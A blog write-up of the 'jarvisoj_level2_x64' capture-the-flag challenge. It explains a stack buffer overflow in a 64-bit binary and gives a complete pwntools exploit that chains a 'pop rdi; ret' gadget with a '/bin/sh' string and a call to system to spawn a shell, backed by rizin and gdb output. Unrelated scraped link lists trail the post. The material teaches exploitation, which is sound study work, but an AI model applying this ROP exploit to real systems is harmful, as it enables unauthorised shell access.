jarvisoj_level2_x64 1 writeup and blog
Here i finish the jarvisoj_level2_x64 1 challenge in buuctf and here is some writeup
(i use English to write this blog for protecting it from CSDN )
i will post my code here and explain it
code
from pwn import *
len = 128 + 8 # filling the stack also RBP
payload = b'a'*len
evil_addr = 0x00000000004006b3 # pop rdi ret
evil_addr1 = 0x00400603 # call sym.imp.system
e = ELF("level2_x64")
sh_addr = 0x00600a90
system_plt = e.plt['system']
payload += p64(evil_addr) + p64(sh_addr) + p64(evil_addr1)
p = process("./level2_x64")
#pause()
p.sendline(payload);
p.interactive()
Analyse the code
using rizin for static analyse and using gdb for dyn
> rizin level2_x64
[0x00400500]> iE
nth paddr vaddr bind type size lib name
---------------------------------------------------------------------
45 0x000006c0 0x004006c0 GLOBAL FUNC 2 __libc_csu_fini
48 ---------- 0x00600a98 GLOBAL NOTYPE 0 _edata
49 0x000006c4 0x004006c4 GLOBAL FUNC 0 _fini
51 0x000005f6 0x004005f6 GLOBAL FUNC 42 vulnerable_function
54 0x00000a80 0x00600a80 GLOBAL NOTYPE 0 __data_start
56 0x00000a88 0x00600a88 GLOBAL OBJ 0 __dso_handle
57 0x000006d0 0x004006d0 GLOBAL OBJ 4 _IO_stdin_used
58 0x00000650 0x00400650 GLOBAL FUNC 101 __libc_csu_init
59 ---------- 0x00600aa0 GLOBAL NOTYPE 0 _end
60 0x00000500 0x00400500 GLOBAL FUNC 0 _start
61 ---------- 0x00600a98 GLOBAL NOTYPE 0 __bss_start
62 0x00000620 0x00400620 GLOBAL FUNC 37 main
63 0x00000a90 0x00600a90 GLOBAL OBJ 8 hint
65 ---------- 0x00600a98 GLOBAL OBJ 0 __TMC_END__
67 0x00000488 0x00400488 GLOBAL FUNC 0 _init
We will dive into main function and vulnerable_function
Let's try main first
also using rizin to decompile it here is the result
[0x00400620]> pdg
void main(int argc, char **argv)
{
char **var_18h;
int var_ch;
sym.vulnerable_function();
sym.imp.system("echo \'Hello World!\'");
return;
}
Now go into the vulnerable_function for more details
void sym.vulnerable_function(void)
{
void *buf;
sym.imp.system("echo Input:");
sym.imp.read(0, &buf, 0x200);
return;
}
Something strange , notice the read funtion's so i will check the assemble code for more
[0x004005f6]> pdf
; CALL XREF from main @ 0x400634
┌ sym.vulnerable_function();
│ ; var void *buf @ stack - 0x88
│ 0x004005f6 push rbp
│ 0x004005f7 mov rbp, rsp
│ 0x004005fa add rsp, 0xffffffffffffff80
│ 0x004005fe mov edi, str.echo_Input: ; 0x4006d4 ; "echo Input:" ; const char *string
│ 0x00400603 call sym.imp.system ; sym.imp.system ; int system(const char *string)
│ 0x00400608 lea rax, [buf]
│ 0x0040060c mov edx, 0x200 ; 512 ; size_t nbyte
│ 0x00400611 mov rsi, rax ; void *buf
│ 0x00400614 mov edi, 0 ; int fildes
│ 0x00400619 call sym.imp.read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
│ 0x0040061e leave
└ 0x0040061f ret
now, the read function's distinct address is pointer into the [buf] which is about locate in stack
here is recive the 0x200 bytes it may be much more larger for the stack , and there is also without canary protection so we can dive into stack overflow via read function
dyn debug
we use gdb for dyn debug to found the exactly number of payload of stack overflow
> gdb vulnerable_function
> c
(gdb) disassemble
Dump of assembler code for function vulnerable_function:
0x00000000004005f6 <+0>: push %rbp
0x00000000004005f7 <+1>: mov %rsp,%rbp
=> 0x00000000004005fa <+4>: add $0xffffffffffffff80,%rsp
0x00000000004005fe <+8>: mov $0x4006d4,%edi
0x0000000000400603 <+13>: call 0x4004c0 <system@plt>
0x0000000000400608 <+18>: lea -0x80(%rbp),%rax
0x000000000040060c <+22>: mov $0x200,%edx
0x0000000000400611 <+27>: mov %rax,%rsi
0x0000000000400614 <+30>: mov $0x0,%edi
0x0000000000400619 <+35>: call 0x4004d0 <read@plt>
0x000000000040061e <+40>: leave
0x000000000040061f <+41>: ret
End of assembler dump.
(gdb) b *vulnerable_function+40
(gdb) c
Continuing.
[Detaching after vfork from child process 730797]
Input:
AAAAAAAA
now we input 8 A into stack let's check where are they so that calculate the exactly length
gdb) x/64wx $rsp
0x7fffffffe3b0: 0x41414141 0x41414141 0x0000080a 0x00000000
0x7fffffffe3c0: 0x00000002 0x00000000 0x00000006 0x80000000
0x7fffffffe3d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe400: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe410: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe420: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe430: 0xffffe450 0x00007fff 0x00400639 0x00000000
0x7fffffffe440: 0xffffe578 0x00007fff 0xffffe578 0x00000001
0x7fffffffe450: 0xffffe4f0 0x00007fff 0xf7db7e08 0x00007fff
0x7fffffffe460: 0xffffe4a0 0x00007fff 0xffffe578 0x00007fff
0x7fffffffe470: 0x00400040 0x00000001 0x00400620 0x00000000
0x7fffffffe480: 0xffffe578 0x00007fff 0x2ef7ab9e 0x5b0c92b4
0x7fffffffe490: 0x00000001 0x00000000 0x00000000 0x00000000
0x7fffffffe4a0: 0xf7ffd000 0x00007fff 0x00000000 0x00000000
(gdb) p $rbp
$1 = (void *) 0x7fffffffe430
it is obvious that we just need the length about |0x7fffffffe3b0-0x7fffffffe430| + 8
(just explain why you need add 8 : because we just calculate the length from rsp low address into rbp low address , but we need length from rsp low address into rbp high address , so we add 8 for x64 arch machine)
now,we just exploit the vulnerable_function , and we can controller the program to execute any code locate in the program
But what we wanna is get a bash shell or something can execute command
we have two choices
I. allocate a memory and write shellcode into it then go to execute it
II. go to somewhere and change args to get our target
For I , it is hard to do this,cause we just can go to any where ,we could not actually allocate memory and write something into it(maybe we can using a brunch of pop|ret command and go to libc to allocate memory which need more details about the program)
For II ,it is much easier,Attention ,there is something special for us
do you remember the first output
[0x00400500]> iE
nth paddr vaddr bind type size lib name
---------------------------------------------------------------------
45 0x000006c0 0x004006c0 GLOBAL FUNC 2 __libc_csu_fini
48 ---------- 0x00600a98 GLOBAL NOTYPE 0 _edata
49 0x000006c4 0x004006c4 GLOBAL FUNC 0 _fini
51 0x000005f6 0x004005f6 GLOBAL FUNC 42 vulnerable_function
54 0x00000a80 0x00600a80 GLOBAL NOTYPE 0 __data_start
56 0x00000a88 0x00600a88 GLOBAL OBJ 0 __dso_handle
57 0x000006d0 0x004006d0 GLOBAL OBJ 4 _IO_stdin_used
58 0x00000650 0x00400650 GLOBAL FUNC 101 __libc_csu_init
59 ---------- 0x00600aa0 GLOBAL NOTYPE 0 _end
60 0x00000500 0x00400500 GLOBAL FUNC 0 _start
61 ---------- 0x00600a98 GLOBAL NOTYPE 0 __bss_start
62 0x00000620 0x00400620 GLOBAL FUNC 37 main
63 0x00000a90 0x00600a90 GLOBAL OBJ 8 hint
65 ---------- 0x00600a98 GLOBAL OBJ 0 __TMC_END__
67 0x00000488 0x00400488 GLOBAL FUNC 0 _init
there is a hint
in 0x00600a90 address
let check what it is
[0x00400500]> px @ 0x00600a90
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x00600a90 2f62 696e 2f73 6800 0000 0000 0000 0000 /bin/sh.........
0x00600aa0 ffff ffff ffff ffff 0000 0000 0000 0000 ................
0x00600ab0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x00600ac0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x00600ad0 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600ae0 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600af0 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b00 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b10 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b20 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b30 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b40 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b50 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b60 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b70 ffff ffff ffff ffff ffff ffff ffff ffff ................
0x00600b80 ffff ffff ffff ffff ffff ffff ffff ffff ................
it is a string contains '/bin/sh' which can be a args for system to spawn a bash shell
ok ,now find the system function ,we just need assembly code like "call systemm;"
We almost win the game!
Firsh we need found the assemble code "call system"
before we go to here we need replace the original argvs with '/bin/sh'
is it similar ,yeah , we had seen it in vulnerable_function
[0x004005f6]> pdf
; CALL XREF from main @ 0x400634
┌ sym.vulnerable_function();
│ ; var void *buf @ stack - 0x88
│ 0x004005f6 push rbp
│ 0x004005f7 mov rbp, rsp
│ 0x004005fa add rsp, 0xffffffffffffff80
│ 0x004005fe mov edi, str.echo_Input: ; 0x4006d4 ; "echo Input:" ; const char *string
│ 0x00400603 call sym.imp.system ; sym.imp.system ; int system(const char *string)
│ 0x00400608 lea rax, [buf]
│ 0x0040060c mov edx, 0x200 ; 512 ; size_t nbyte
│ 0x00400611 mov rsi, rax ; void *buf
│ 0x00400614 mov edi, 0 ; int fildes
│ 0x00400619 call sym.imp.read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
│ 0x0040061e leave
└ 0x0040061f ret
now the can go to 0x00400603 with edi pointer '/bin/sh'
ROP
if you do not understand what ROP is, just go to learn it and come back continue
⋊> ~/solve ROPgadget --binary level2_x64 --only "pop|ret" |grep rdi 10:29:20
0x00000000004006b3 : pop rdi ; ret
so we got one gadget ,it is enough
we got the flag !
Here is what stack is after we send payload
(gdb) x/64wx $rsp
rsp-> 0x7ffc0a0ce240: 0x61616161 0x61616161 0x61616161 0x61616161
0x7ffc0a0ce250: 0x61616161 0x61616161 0x61616161 0x61616161
0x7ffc0a0ce260: 0x61616161 0x61616161 0x61616161 0x61616161
0x7ffc0a0ce270: 0x61616161 0x61616161 0x61616161 0x61616161
0x7ffc0a0ce280: 0x61616161 0x61616161 0x61616161 0x61616161
0x7ffc0a0ce290: 0x61616161 0x61616161 0x61616161 0x61616161
0x7ffc0a0ce2a0: 0x61616161 0x61616161 0x61616161 0x61616161
0x7ffc0a0ce2b0: 0x61616161 0x61616161 0x61616161 0x61616161
rbp-> 0x7ffc0a0ce2c0: 0x61616161 0x61616161 0x004006b3 0x00000000 <- return address (pop rdi ;ret)
sh-> 0x7ffc0a0ce2d0: 0x00600a90 0x00000000 0x00400603 0x00000000 <-call system address
0x7ffc0a0ce2e0: 0x0a0ce30a 0x00007ffc 0xd226fe08 0x00007897
0x7ffc0a0ce2f0: 0x0a0ce330 0x00007ffc 0x0a0ce408 0x00007ffc
0x7ffc0a0ce300: 0x00400040 0x00000001 0x00400620 0x00000000
0x7ffc0a0ce310: 0x0a0ce408 0x00007ffc 0xd585d4a1 0x05f8e39e
0x7ffc0a0ce320: 0x00000001 0x00000000 0x00000000 0x00000000
0x7ffc0a0ce330: 0xd24b5000 0x00007897 0x00000000 0x00000000
it will return to address 0x4006b3 which contains assemble code "pop rdi;ret"
now it execute pop rdi which pop the next address into rdi , yeah it is sh_address
then execute ret command again , which is equ "pop rip" ,so it return to "call system"
Finally you got the bash shell
Thanks for viewing
jarvisoj_level2_x64 1 writeup and blog的更多相关文章
- xss练习平台及writeup
今天玩了一天的xss. 分享几个xss game https://xss.haozi.me/#/0x00 http://47.94.13.75/test/ writeup:http://www.cn ...
- 2016第七季极客大挑战Writeup
第一次接触CTF,只会做杂项和一点点Web题--因为时间比较仓促,写的比较简略.以后再写下工具使用什么的. 纯新手,啥都不会.处于瑟瑟发抖的状态. 一.MISC 1.签到题 直接填入题目所给的SYC{ ...
- ISCC2016 WriteUp
日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...
- 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp
洒家近期参加了 Tokyo Westerns / MMA CTF 2nd 2016(TWCTF) 比赛,不得不说国际赛的玩法比国内赛更有玩头,有的题给洒家一种一看就知道怎么做,但是做出来还需要洒家拍一 ...
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- NCTF2018 Easy_Audit的writeup
题目直接给出来代码 这题考几个点: 1.$_REQUEST的变量覆盖 2.编码绕过 3.PHP数组特性 4.正则绕过 5.file_get_contents函数 首先一步步把题目分析一遍 if($_R ...
- ctf题目writeup(1)
2019/1/28 题目来源:爱春秋 https://www.ichunqiu.com/battalion?t=1 1. 该文件是一个音频文件: 首先打开听了一下,有短促的长的....刚开始以为是摩斯 ...
- 2019年领航杯 江苏省网络信息安全竞赛 初赛部分writeup
赛题已上传,下载连接:https://github.com/raddyfiy/2019linghangcup 做出了全部的misc和前三道逆向题,排名第10,暂且贴一下writeup. 关卡一 编码解 ...
- XCTF攻防世界Web之WriteUp
XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...
- 31C3 CTF web关writeup
0x00 背景 31c3 CTF 还是很人性化的,比赛结束了之后还可以玩.看题解做出了当时不会做的题目,写了一个writeup. 英文的题解可以看这:https://github.com/ctfs/w ...
随机推荐
- 线性dp:LeetCode674. 最长连续递增序列
LeetCode674. 最长连续递增序列 阅读本文之前,需要先了解"动态规划方法论",这在我的文章以前有讲过 链接:动态规划方法论 本文之前也讲过一篇文章:最长递增子序列,这道题 ...
- 组合数取模的几种方法--Exlucas&杨辉三角&组合
组合数取模的几个方法 求: \[C^{m}_{n} \bmod P \] 1.杨辉三角法 \[C^{m}_{n} = C^{m - 1}_{n - 1} + C^{ m }_{n - 1} \] 时间 ...
- 全网最适合入门的面向对象编程教程:38 Python常用复合数据类型-使用列表实现堆栈、队列和双端队列
全网最适合入门的面向对象编程教程:38 Python 常用复合数据类型-使用列表实现堆栈.队列和双端队列 摘要: 在 Python 中,列表(list)是一种非常灵活的数据结构,可以用来实现堆栈(st ...
- github拉取项目执行npm i 失败的问题
一般卡在core-js没反应,然后报错的第一行是和node-sass有关的,基本上都是node-sass版本问题,这时候只需要在命令行输入两行代码就行 先把原来的依赖删掉 npm uni node-s ...
- Go context 介绍
在 Go 编程语言中,context 包提供了一个用于在 goroutine 之间传递上下文信息的方法.它通常用于控制 goroutine 的生命周期.传递请求范围内的数据.以及处理超时或取消信号.c ...
- Gluon 编译 JavaFx -> android apk
Gluon 编译 JavaFx -> android apk 本文的内容属 在linux服务器上 搭建 Gluon 编译 android-apk 环境 这一篇文章直接跟着官网操作一次性成功 虚拟 ...
- PlugIR:开源还不用微调,首尔大学提出即插即用的多轮对话图文检索 | ACL 2024
即插即用的PlugIR通过LLM提问者和用户之间的对话逐步改进文本查询以进行图像检索,然后利用LLM将对话转换为检索模型更易理解的格式(一句话).首先,通过重新构造对话形式上下文消除了在现有视觉对话数 ...
- Goby漏洞发布 | 0day NACOS /nacos/v1/cs/ops/data/removal RCE代码执行漏洞【已验证】
漏洞名称:NACOS /nacos/v1/cs/ops/data/removal RCE代码执行漏洞 English Name:NACOS /nacos/v1/cs/ops/data/removal ...
- mongo集群同步数据异常,手动同步节点副本数据
转载请注明出处: 数据同步方案 当副本集节点的复制进程落后太多,以至于主节点覆盖了该节点尚未复制的 oplog 条目时,副本集节点就会变为"陈旧".节点跟不上,就会变得" ...
- String 的 intern() 方法
问题: String s1 = "a" + "b"; //创建了几个对象? String s2 = new String("ab"); // ...